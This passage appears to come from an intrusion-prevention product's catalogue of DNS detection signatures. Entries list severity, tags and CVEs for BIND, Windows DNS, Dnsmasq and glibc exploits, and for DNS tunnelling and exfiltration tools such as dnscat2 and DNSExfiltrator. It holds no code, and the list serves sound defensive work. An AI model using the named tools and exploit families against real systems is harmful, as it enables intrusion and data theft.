Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Description:
Back to top

DNS-TCP_Standard-Query-Request-Type-KEY

About this situation: A DNS Standard Query Request with type KEY detected
Context: DNS TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Description:
Back to top

DNS-TCP_Standard-Query-Request-Type-MX

About this situation: A DNS Standard Query Request with type MX detected
Context: DNS TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Description:
Back to top

DNS-TCP_Standard-Query-Request-Type-Null

About this situation: A DNS Standard Query Request with type NULL detected
Context: DNS TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Description:
Back to top

DNS-TCP_Standard-Query-Request-Type-SRV

About this situation: A DNS Standard Query Request with type SRV detected
Context: DNS TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Description:
Back to top

DNS-TCP_Standard-Query-Request-Type-TXT

About this situation: A DNS Standard Query Request with type TXT detected
Context: DNS TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Description:
Back to top

DNS-TCP_Standard-Query-Request-Type-WKS

About this situation: A DNS Standard Query Request with type WKS detected
Context: DNS TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Description:
Back to top

DNS-TCP_Suspicious-Content

About this situation: Detected suspicious content
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-868-5242
Last changed: sgpkg-ips-868-5242
Description:
Back to top

DNS-TCP_Suspicious-Response

About this situation: A suspicious DNS query reply
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-735-5211
Description:
Back to top

DNS-TCP_Symantec-Gateway-Products-DNS-Cache-Poisoning

About this situation: An attempt to exploit a vulnerability in Symantec Gateway Security detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Gateway Security, Symantec Enterprise Firewall, Symantec VelociRaptor, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-604-5211
Vulnerability: Symantec-Gateway-Products-DNS-Cache-Poisoning
Description:
Back to top

DNS-TCP_Systemd-Resolved-DNS_Packet_New-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Systemd detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Systemd, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-949-5242
Last changed: sgpkg-ips-949-5242
Vulnerability: Systemd-Resolved-DNS_Packet_New-Heap-Buffer-Overflow
Description:
Back to top

DNS-TCP_Txt-Query-Reply-255-Length

About this situation: DNS TXT type query reply with 255 bytes of data length detected
Context: DNS TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Description:
Back to top

DNS-TCP_Uid-Response-Detect

About this situation: Possible remote intrusion, uid response detected
Context: DNS TCP Server Stream
Severity: 8
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic, UID Response Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

DNS-TCP_Uncommon-Address-Resolved

About this situation: DNS query reply with a uncommon address resolve detected
Context: DNS TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Description:
Back to top

DNS-TCP_Windows-Dnsapi-Remote-Code-Execution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Windows DNSAPI detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-06, CVE2018, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1076-5242
Last changed: sgpkg-ips-1076-5242
Vulnerability: Windows-Dnsapi-Remote-Code-Execution-Vulnerability
Description:
Back to top

DNS-TCP_Windows-Server-Remote-Code-Execution-Malicious-Request-CVE-2020-1350

About this situation: Integer overflow while parsing SIG records.
Context: DNS TCP Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1264-5242
Last changed: sgpkg-ips-1327-5242
Vulnerability: Microsoft-Windows-DNS-Server-Remote-Code-Execution-CVE-2020-1350
Description:
Back to top

DNS-TCP_Windows-Server-Remote-Code-Execution-Malicious-Response-CVE-2020-1350

About this situation: Integer overflow while parsing SIG records.
Context: DNS TCP Server Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1264-5242
Last changed: sgpkg-ips-1266-5242
Vulnerability: Microsoft-Windows-DNS-Server-Remote-Code-Execution-CVE-2020-1350
Description:
Back to top

DNS-TCP_X86-BOF-10

About this situation: BSD BIND DNS server exploit detected
Context: DNS TCP Client Stream
Severity: 10
Tags: Any Operating System, x86, BIND, CVE1999, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_X86-BSD-NXT-BOF-1

About this situation: BIND 8.2 NXT x86 BSD buffer overflow exploit detected
Context: DNS TCP Server Stream
Severity: 10
Tags: BSD, x86, BIND, CVE1999, BSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-NXT-BO
Description:
Back to top

DNS-TCP_X86-BSD-NXT-BOF-2

About this situation: BIND NXT record buffer overflow attack on x86 BSD operating systems
Context: DNS TCP Server Stream
Severity: 10
Tags: BSD, x86, BIND, CVE1999, BSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-NXT-BO
Description:
Back to top

DNS-TCP_X86-Iquery-BOF-1

About this situation: Named_ADMv2 exploit against CVE-1999-0009 detected
Context: DNS TCP Client Stream
Severity: 10
Tags: Linux, x86, BIND, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_X86-Iquery-BOF-11

About this situation: Linux BIND DNS server exploit detected
Context: DNS TCP Client Stream
Severity: 10
Tags: Linux, x86, BIND, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_X86-Iquery-BOF-2

About this situation: Named_ADMv3 exploit has been detected
Context: DNS TCP Client Stream
Severity: 10
Tags: Linux, x86, BIND, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_X86-Iquery-BOF-3

About this situation: Linux BIND DNS server exploit detected
Context: DNS TCP Client Stream
Severity: 10
Tags: Linux, x86, BIND, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_X86-Iquery-BOF-6

About this situation: BIND DNS server exploit detected
Context: DNS TCP Client Stream
Severity: 10
Tags: Any Operating System, x86, BIND, CVE1999, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_X86-Iquery-BOF-7

About this situation: Linux BIND DNS server exploit detected
Context: DNS TCP Client Stream
Severity: 10
Tags: Linux, x86, BIND, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_X86-Iquery-BOF-8

About this situation: BSD BIND DNS server exploit detected
Context: DNS TCP Client Stream
Severity: 10
Tags: BSD, x86, BIND, CVE1999, BSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_X86-Iquery-BOF-9

About this situation: Linux BIND DNS server exploit detected
Context: DNS TCP Client Stream
Severity: 10
Tags: Linux, x86, BIND, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_X86-Linux-NXT-BOF-1

About this situation: BIND NXT record buffer overflow attack on Linux operating system
Context: DNS TCP Server Stream
Severity: 10
Tags: Linux, x86, BIND, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-NXT-BO
Description:
Back to top

DNS-TCP_X86-Linux-NXT-BOF-2

About this situation: BIND NXT record buffer overflow attack on Linux operating system
Context: DNS TCP Server Stream
Severity: 10
Tags: Linux, x86, BIND, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-NXT-BO
Description:
Back to top

DNS-TCP_X86-Linux-NXT-BOF-3

About this situation: BIND NXT record buffer overflow attack on Linux operating system
Context: DNS TCP Server Stream
Severity: 10
Tags: Solaris, HP-UX, AIX, Linux, IRIX, x86, BIND, CVE1999, Solaris not specific, HP-UX not specific, AIX not specific, Linux not specific, IRIX not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-NXT-BO
Description:
Back to top

DNS-TCP_X86-Serverside-ShellCode-Detect

About this situation: Possible x86 shellcode detected in the DNS server stream
Context: DNS TCP Server Stream
Severity: 8
Tags: Any Operating System, x86, DNS client, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-645-5211
Description:
Back to top

DNS-UDP_BIND-Opt-Subdomain-Denial-Of-Service

About this situation: Denial of Service in BIND
Context: DNS UDP Client Message
Severity: 2
Tags: Unix, Any Hardware, BIND, CVE2002, Unix not specific, Potential Denial of Service
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Opt-Subdomain-Denial-Of-Service
Description:
Back to top

DNS-UDP_BIND-TKEY-Queries-Input-Validation-DoS-3

About this situation: A name server denial of service query
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2015, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: ISC-BIND-TKEY-Queries-Input-Validation-DoS
Description:
Back to top

DNS-UDP_BIND-Tsig-X86-BOF

About this situation: Possible buffer overflow exploit detected
Context: DNS UDP Client Message
Severity: 10
Tags: Any Operating System, x86, BIND, CVE2001, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-182-2032
Vulnerability: BIND-Tsig-BO
Description:
Back to top

DNS-UDP_BIND-Tsig-X86-Linux-BOF

About this situation: Possible buffer overflow exploit detected
Context: DNS UDP Client Message
Severity: 10
Tags: Any Operating System, x86, BIND, CVE2001, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Tsig-BO
Description:
Back to top

DNS-UDP_BIND-Tsig-X86-Linux-BOF-2

About this situation: Possible buffer overflow exploit detected
Context: DNS UDP Client Message
Severity: 10
Tags: Any Operating System, x86, BIND, CVE2001, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Tsig-BO
Description:
Back to top

DNS-UDP_Botnet-Win32-Backdoor-Zmcwinsvc-DNS-Query

About this situation: A Botnet Win32 Backdoor Zmcwinsvc DNS Query detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Vulnerability: Botnet-Win32-Backdoor-Zmcwinsvc-DNS-Query
Description:
Back to top

DNS-UDP_DNS-Error-Response-With-Same-Source-And-Destination-Ports

About this situation: An unusual DNS response detected
Context: DNS UDP Client Message
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, CVE2024, Any Operating System not specific, Any Software not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1709-5242
Last changed: sgpkg-ips-1709-5242
Vulnerability: Loop-Denial-Of-Service-CVE-2024-2169
Description:
Back to top

DNS-UDP_DNS-Query-Containing-Base64-Encoded-Data

About this situation: A DNS query containing base64-encoded data detected
Context: DNS UDP Client Message
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Disclosure
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1658-5242
Vulnerability: DNS-Query-Containing-Base64-Encoded-Data
Description:
Back to top

DNS-UDP_dnscat2-DNS-Tunnel-Usage

About this situation: An attempt to use dnscat2 DNS tunneling software
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1215-5242
Vulnerability: dnscat2-DNS-Tunnel-Usage
Description:
Back to top

DNS-UDP_DNSExfiltrator-Traffic

About this situation: A DNS request associated with DNSExfiltrator tool detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Suspected Disclosure, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1073-5242
Last changed: sgpkg-ips-1110-5242
Description:
Back to top

DNS-UDP_Dnsmasq-extract_Name-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Dnsmasq detected.
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Dnsmasq, CVE2020, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Vulnerability: Dnsmasq-extract_Name-Out-Of-Bounds-Write
Description:
Back to top

DNS-UDP_Dnsmasq-Sort_rrset-CVE-2020-25687-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Dnsmasq detected.
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Dnsmasq, CVE2020, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Dnsmasq-Sort_rrset-CVE-2020-25687-Out-Of-Bounds-Write
Description:
Back to top

DNS-UDP_Dot-Query

About this situation: DNS Dot Query detected
Context: DNS UDP Client Message
Severity: 1
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Protocol Information
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-595-5211
Description:
Back to top

DNS-UDP_Dynamic-DNS-WPAD-Host-Name-Registration

About this situation: Detected an attempt to register host name WPAD dynamically
Context: DNS UDP Client Message
Severity: 7
Tags: Windows 2003, Windows 2000 Server, Windows 2008, Any Hardware, MS2009-03, CVE2009, Windows 2003 not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-212-2032
Last changed: sgpkg-ips-640-5211
Vulnerability: Microsoft-DNS-Server-WPAD-Registration-Spoofing
Description:
Back to top

DNS-UDP_Ebury-SSH-Backdoor

About this situation: Ebury SSH Rootkit backdoor detected
Context: DNS UDP Client Message
Severity: 10
Tags: Unix, Linux, Any Hardware, Ebury SSH Rootkit, Unix not specific, Linux not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-571-5211
Description:
Back to top

DNS-UDP_Empty-TTL-In-Reply

About this situation: An empty TTL field in DNS reply detected.
Context: DNS UDP Server Message
Severity: 2
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2017, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-958-5242
Last changed: sgpkg-ips-958-5242
Vulnerability: Isc-Bind-RPZ-Query-Processing-Denial-Of-Service
Description:
Back to top

DNS-UDP_Exim-DKIM-DNS-Decoding-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Exim Project Exim detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Exim, CVE2012, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-1406-5242
Vulnerability: Exim-DKIM-DNS-Decoding-Buffer-Overflow
Description:
Back to top

DNS-UDP_Glibc-DNS-Resolver-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in glibc detected
Context: DNS UDP Server Message
Severity: 7
Tags: Linux, Any Hardware, glibc, CVE2002, Linux not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-450-4333
Vulnerability: Glibc-DNS-Resolver-Buffer-Overflow
Description:
Back to top

DNS-UDP_Gnu-C-Library-Glibc-Getanswer_r-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GNU glibc detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, glibc, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-644-5211
Last changed: sgpkg-ips-644-5211
Vulnerability: Gnu-C-Library-Glibc-Getanswer_r-Buffer-Overflow
Description:
Back to top

DNS-UDP_GnuTLS-DANE-dane.c-Heap-Buffer-Overflow

About this situation: A GnuTLS DANE dane.c Heap Buffer Overflow vulnerability
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, GnuTLS, CVE2013, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: GnuTLS-DANE-dane.c-Heap-Buffer-Overflow
Description:
Back to top

DNS-UDP_Inverse-Infoleak

About this situation: A name server infoleak query
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2001, Any Operating System not specific, Probe, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-179-2032
Vulnerability: BIND-Inverse-Infoleak
Description:
Back to top

DNS-UDP_Inverse-Infoleak-2

About this situation: A name server infoleak query
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2001, Any Operating System not specific, Suspected Probe, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-337-4219
Last changed: sgpkg-ips-337-4219
Vulnerability: BIND-Inverse-Infoleak
Description:
Back to top

DNS-UDP_Isc-Authoritative-Resource-Record

About this situation: Used in a correlation to detect a denial of service vulnerability in ISC BIND
Context: DNS UDP Server Message
Severity: 1
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2014, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1400-5242
Vulnerability: Isc-Bind-Recursive-Resolver-Resource-Consumption-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-Any-Query-Response-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2016, Any Operating System not specific, Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: ISC-Bind-Any-Query-Response-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-Apl_42.c-Insist-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1408-5242
Vulnerability: ISC-Bind-Apl_42.c-Insist-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-Buffer.c-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Vulnerability: ISC-Bind-Buffer.c-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-Buffer.c-Require-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2015, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, 2nd Most Recent Update, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-1872-5242
Vulnerability: ISC-Bind-Buffer.c-Require-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_Isc-Bind-Db.c-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 2
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2015, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-723-5211
Vulnerability: Isc-Bind-Db.c-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_Isc-Bind-Db.c-Assertion-Failure-DoS

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1012-5242
Last changed: sgpkg-ips-1012-5242
Vulnerability: Isc-Bind-Db.c-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-BIND-Denial-Of-Service-CVE-2017-3140

About this situation: An attempt to exploit a DoS vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2017, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Isc-Bind-RPZ-Query-Processing-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-Deny-Answer-Aliases-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2018, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: ISC-Bind-Deny-Answer-Aliases-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-Dname-Response-Processing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-830-5242
Last changed: sgpkg-ips-1506-5242
Vulnerability: ISC-Bind-Dname-Response-Processing-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-Dname-RRSIG-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-1870-5242
Vulnerability: ISC-Bind-Dname-RRSIG-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-DNS-Cookie-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-1408-5242
Vulnerability: ISC-Bind-DNS-Cookie-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-Bind-DNS-Options-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-820-5242
Last changed: sgpkg-ips-820-5242
Vulnerability: ISC-Bind-DNS-Options-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-UDP_ISC-BIND-DNS64-And-RPZ-Query-Processing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
